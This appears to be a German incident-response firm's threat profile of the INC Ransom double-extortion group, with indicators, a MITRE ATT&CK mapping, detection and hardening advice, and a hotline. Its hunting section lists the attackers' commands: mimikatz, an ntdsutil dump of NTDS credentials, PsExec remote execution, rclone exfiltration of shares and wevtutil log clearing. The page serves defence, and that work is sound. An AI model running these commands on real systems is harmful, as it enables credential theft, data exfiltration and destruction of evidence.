Was ist INC Ransom (Incransom) Ransomware?

INC Ransom ist eine Double-Extortion-Ransomware-Gruppe, die seit 2023 aktiv ist. Sie greift weltweit Organisationen an, verschlüsselt Daten mit der Dateiendung .INC und droht damit, gestohlene Informationen auf einer Tor-Leak-Site zu veröffentlichen, falls kein Lösegeld gezahlt wird.

Was soll ich tun, wenn meine Organisation von INC Ransom betroffen ist?

Isolieren Sie betroffene Systeme sofort vom Netzwerk, bewahren Sie Logdaten und forensische Artefakte auf und kontaktieren Sie ein erfahrenes Incident-Response-Team. Vermeiden Sie es, verschlüsselte Daten zu löschen, Systeme voreilig neu aufzusetzen oder ohne fachliche Unterstützung direkt mit den Tätern zu verhandeln.

Double-Extortion RaaS · Aktiv seit 2023 · Zielgerichtete Angriffe

INC Ransom (Incransom) – Ransomware-Profil, Indikatoren & Reaktionsleitfaden

INC Ransom – auch als Incransom bezeichnet – ist eine Double-Extortion-Ransomware, die seit 2023 aktiv ist. Die Gruppe greift weltweit Organisationen an, verschlüsselt Daten mit der Endung .INC und droht, erbeutete Informationen auf einer Tor-basierten Leak-Site zu veröffentlichen, falls kein Lösegeld gezahlt wird.

24/7 Hotline anrufen Incident-Response-Support anfragen

10+ Jahre Erfahrung mit Ransomware-Fällen EU-basiertes Digital-Forensics- & IR-Team INC Ransom, Akira, Qilin, LockBit & mehr

Soforthilfe • Vertraulich

Möglicherweise läuft ein aktiver Angriff

Typische INC-Ransom-Vorfälle beinhalten Datendiebstahl, domänenweite Verschlüsselung und die Drohung, sensible Informationen auf Tor zu veröffentlichen. Sprechen Sie direkt mit einem Incident Responder – nicht mit einem Callcenter.

+49 (7275) 9692381

oder schreiben Sie an dfir@mh-service.de
Betreff: „INC Ransom Incident“

✔ Erste technische Einordnung in kurzer Zeit
✔ Klare Handlungsempfehlungen für die nächsten 1–4 Stunden
✔ Unterstützung bei Management-, Rechts- und Meldepflicht-Kommunikation

INC Ransom Leak-Site im Tor-Netzwerk mit veröffentlichten Opfern — Beispiel einer INC-Ransom-Leak-Seite (Tor Hidden Service, Opferangaben anonymisiert).

Gruppenprofil & zentrale Eckdaten

Erstmalig beobachtet: Mitte 2023 (Kampagnen für Windows & Linux)
Modell: Ransomware-as-a-Service (RaaS), Double Extortion
Ransomnote: INC-README.txt
Dateiendung: Verschlüsselte Dateien enden häufig auf .INC

Zielprofil

INC Ransom zielt vor allem auf Organisationen statt auf Privatanwender – u. a. Industrie, Professional Services, Bildung, Bauwesen und Gesundheitswesen. Opfer finden sich weltweit, mit einem Schwerpunkt in Europa und Nordamerika.

Angriffsstrategie

Häufiger Ablauf: initialer Zugriff über exponierte Dienste oder Edge-Geräte (z. B. VPN-Gateways, Firewalls), anschließender Credential Diebstahl, laterale Bewegung zu zentralen Systemen, Datenausleitung und großflächige Verschlüsselung – gefolgt von Erpressung über eine Tor-basierte Leak-Site.

Geschäftliche Auswirkungen

Betroffen sind oft Kernsysteme wie Fileserver, Virtualisierung, ERP oder E-Mail. Neben der Betriebsunterbrechung sind regulatorische Risiken und Reputationsschäden durch Datenlecks erheblich – selbst dann, wenn noch verwertbare Backups vorhanden sind.

Dateiindikatoren – Endungen, Notizen & Artefakte

Dateiendungen & Ransomnotes

Verschlüsselte Dateien: häufig mit der Erweiterung .INC.
Ransomnote: Textdatei mit dem Namen INC-README.txt in betroffenen Verzeichnissen.
Opfer-ID & Kontakt: die Notiz enthält typischerweise eine Opfer-ID und Anweisungen zum Zugriff auf ein Tor-basiertes Chat-Portal.

Hinweis: Dateinamen, Erweiterungen und Wortlaut können sich zwischen Kampagnen verändern. Diese Angaben sind Beispiele und kein vollständiger IOC-Katalog.

Beispielartefakte für Hunting & Monitoring

Neu angelegte INC-README.txt-Dateien auf Fileservern und Benutzerprofilen.
Auffällige Peaks von Datei-Umbenennungen mit anschließenden starken Größenänderungen.
Verdächtige EXE- oder Script-Dateien in temporären Ordnern oder Benutzerverzeichnissen.
Vorbereitete Archive (z. B. .zip, .7z) an ungewohnten Speicherorten vor Beginn der Verschlüsselung.

Indicators of Compromise (IOCs) & häufig genutzte Tools

Öffentliche Berichte und Vorfallserfahrungen zeigen, dass INC-Ransom-Operatoren häufig auf bekannte Administrations- und Offensiv-Tools zurückgreifen. Diese Werkzeuge sind für sich genommen nicht immer bösartig, ihr Kontext und ihre Kombination können jedoch stark verdächtig sein.

Beispiele für Kommandos & Werkzeuge in Kampagnen

# Discovery & Situationsbewertung
ipconfig /all
systeminfo
netstat -ano
nltest /dclist:IHREDOMÄNE
nltest /domain_trusts

# Credentials & Privilegien
mimikatz.exe
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit

# Laterale Bewegung & Remote-Ausführung
PsExec.exe \\HOST cmd.exe
wmic process call create …

# Datenstaging & Exfiltration
rclone.exe copy C:\Shares remote:backup --config C:\temp\rclone.conf
restic backup C:\ImportantData --repo …

# Verteidigungsumgehung & Log-Manipulation
wevtutil cl Security
taskkill /F /IM securitytool.exe

Die Beispiele sind vereinfacht und dienen der Erkennung und Jagd. Allein genommen weisen sie nicht eindeutig auf INC Ransom hin, sollten aber in Kombination mit anderen Auffälligkeiten genauer untersucht werden.

Netzwerkindikatoren, Leak-Site & Infrastruktur

INC Ransom betreibt Tor-basierte Leak-Seiten, auf denen nicht zahlende Opfer gelistet und gestohlene Daten veröffentlicht werden, sowie Chat-Portale für Verhandlungen. Diese Infrastruktur ist zentraler Bestandteil der Double-Extortion-Strategie.

Leak-Site: Tor Hidden Service, über den Opferbezeichnungen und Datenleaks veröffentlicht werden.
Chat-Portal: separates Tor-Angebot für Verhandlungen und „Support“.
Datenübertragung: Exfiltration häufig über Cloud-Speichertools oder dedizierte SFTP/RDP-Server.

Aus OpSec-Sicht empfiehlt sich das Monitoring ausgehender Verbindungen zu unbekannten Cloudspeichern, VPS-Anbietern und Anonymisierungsinfrastruktur, statt sich ausschließlich auf statische Onion- oder IP-Indikatoren zu verlassen.

MITRE ATT&CK Mapping – typische Techniken von INC Ransom

Das folgende Mapping bildet einen zusammengefassten Blick auf Basis öffentlicher Threat Intelligence und typischer Double-Extortion-Playbooks. Konkrete Vorfälle können abweichen.

Initial Access: T1078 Valid Accounts (VPN, RDP), T1133 External Remote Services, Ausnutzen verwundbarer Edge-Geräte.
Execution: T1059 Command and Scripting Interpreter (PowerShell, CMD, Bash).
Persistence: T1547 Boot or Logon Autostart Execution (Dienste, Run-Keys, geplante Tasks).
Privilege Escalation: T1068 Exploitation for Privilege Escalation.
Defense Evasion: T1562 Impair Defenses (AV/EDR-Manipulation, Abschalten von Diensten), T1070 Indicator Removal.
Credential Access: T1003 OS Credential Dumping (NTDS, LSASS, SAM mit Tools wie Mimikatz).
Discovery: T1087 Account Discovery, T1018 Remote System Discovery, T1049 System Network Connections Discovery.
Lateral Movement: T1021 Remote Services (RDP, SMB, WinRM), T1021.002 SMB/Windows Admin Shares.
Collection: T1119 Automated Collection über Fileshares und Anwendungssysteme.
Exfiltration: T1041 Exfiltration Over C2 Channel (z. B. über Cloud-Speicher-Tools).
Impact: T1486 Data Encrypted for Impact, T1490 Inhibit System Recovery (Löschen von Shadow Copies, Backups, Snapshots).

Wie lässt sich ein INC-Ransom-Angriff erkennen und das Risiko senken?

Schwerpunkte für Detection & Telemetrie

Anmeldeauffälligkeiten: gehäufte Fehlanmeldungen, Legacy-VPN ohne MFA, Logins aus ungewohnten Ländern oder Netzen.
Endpoint-Verhalten: verdächtige Tools aus Temp-Verzeichnissen, verschlüsselungsähnliche Dateizugriffsmuster, schnelles Stoppen von Diensten.
Backup-Infrastruktur: unerwartetes Löschen von Snapshots, Deaktivierung von Backup-Jobs, Änderungen durch Nicht-Backup-Konten.
Netzwerkverkehr: neue ausgehende Verbindungen zu unbekannten Cloud-Speichern oder VPS, insbesondere kurz vor der Verschlüsselung.

Hardening & Basis-Schutzmaßnahmen

Durchgängige MFA für alle externen Zugänge (VPN, RDP-Gateways, Cloud-Admin-Logins).
Reduktion und Monitoring öffentlich erreichbarer Dienste – besonders Legacy-VPNs, RDP und Web-Management-Oberflächen.
Netzwerksegmentierung für Backups, Domänencontroller und geschäftskritische Systeme.
Etablierung und regelmäßiger Test von Offline- oder unveränderlichen Backups sowie dokumentierten Wiederanlaufprozeduren.

Entschlüsselung & Datenwiederherstellung bei INC Ransom

Sind INC-Ransom-Dateien ohne Lösegeld wiederherstellbar?

Zum Zeitpunkt dieser Analyse ist kein öffentlich verfügbares, universelles Entschlüsselungstool für aktuelle INC-Ransom-Varianten bekannt. Für einzelne frühe oder spezifische Builds berichten Sicherheitsforscher und Incident-Response-Teams von erfolgreichen Entschlüsselungen – diese Verfahren sind jedoch nicht allgemein auf alle Opfer übertragbar.

In der Praxis konzentrieren sich Wiederherstellungsoptionen daher meist auf:

Wiederherstellung aus sauberen, offline oder unveränderlichen Backups, die nicht betroffen waren.
Rückgriff auf Snapshots, Replikate oder Archivkopien in Storage-Systemen und Cloud-Services.
Zielgerichtete Datei-Restores, wenn Daten teilweise unverschlüsselt oder Shadow Copies noch vorhanden sind.

            Wichtig:
            
              Löschen Sie verschlüsselte Daten nicht. Auch wenn aktuell keine Entschlüsselung möglich ist, können zukünftig
              Schlüssel oder Tools für bestimmte Varianten veröffentlicht werden. Zudem sind verschlüsselte Dateien, Logs
              und forensische Artefakte entscheidend für spätere Analysen, Versicherungsfälle und rechtliche Verfahren.

Weitere Threat Intelligence & Analysen

Für ein aktuelles Lagebild zu INC Ransom sollten offene Threat-Intelligence-Quellen (Vendor-Blogs, CERT-Hinweise, Open-Source-Feeds) mit der eigenen Telemetrie verknüpft werden.

Analysen von Sicherheitsanbietern zu TTPs, Infrastruktur und Varianten von INC Ransom.
Untersuchungen zu Windows- und Linux-Payloads in Fachblogs oder Fachartikeln.
Hinweise von Regierungsstellen / CERTs, in denen INC Ransom als aktive Bedrohungsgruppe geführt wird.

Unser DFIR-Team verfolgt Änderungen bei Tools, Infrastruktur und Verhandlungspraktiken von INC Ransom fortlaufend und überführt diese in Hunting-Queries, Detection-Content und Härtungs-Empfehlungen.

Weitere Ransomware-Gruppen & verbundene Risiken

Organisationen, die von INC Ransom betroffen sind, müssen häufig auch ihre Exponierung gegenüber anderen aktiven Double-Extortion-Gruppen bewerten. Wir bieten eigene Analysen und Response-Leistungen u. a. für: